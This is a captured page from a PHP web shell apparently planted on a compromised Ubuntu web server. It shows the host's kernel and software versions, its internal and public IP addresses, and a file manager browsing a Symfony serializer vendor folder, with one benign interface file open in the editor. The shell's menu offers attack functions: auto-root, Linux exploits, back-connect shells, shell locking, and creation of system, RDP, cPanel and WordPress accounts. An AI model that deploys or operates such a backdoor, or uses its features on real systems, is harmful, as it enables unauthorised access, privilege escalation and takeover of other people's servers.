Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 18.218.102.138
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
boaz /
vendor /
symfony /
serializer /
[ HOME SHELL ]
Name
Size
Permission
Action
Annotation
[ DIR ]
drwxrwxr-x
DependencyInjection
[ DIR ]
drwxrwxr-x
Encoder
[ DIR ]
drwxrwxr-x
Exception
[ DIR ]
drwxrwxr-x
Extractor
[ DIR ]
drwxrwxr-x
Mapping
[ DIR ]
drwxrwxr-x
NameConverter
[ DIR ]
drwxrwxr-x
Normalizer
[ DIR ]
drwxrwxr-x
CHANGELOG.md
10.57
KB
-rw-rw-r--
LICENSE
1.04
KB
-rw-rw-r--
README.md
591
B
-rw-rw-r--
Serializer.php
12.16
KB
-rw-rw-r--
SerializerAwareInterface.php
499
B
-rw-rw-r--
SerializerAwareTrait.php
559
B
-rw-rw-r--
SerializerInterface.php
915
B
-rw-rw-r--
composer.json
2.35
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : SerializerInterface.php
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Serializer; /** * @author Jordi Boggiano <j.boggiano@seld.be> */ interface SerializerInterface { /** * Serializes data in the appropriate format. * * @param mixed $data Any data * @param string $format Format name * @param array $context Options normalizers/encoders have access to * * @return string */ public function serialize($data, string $format, array $context = []); /** * Deserializes data into the given type. * * @param mixed $data * * @return mixed */ public function deserialize($data, string $type, string $format, array $context = []); }
Close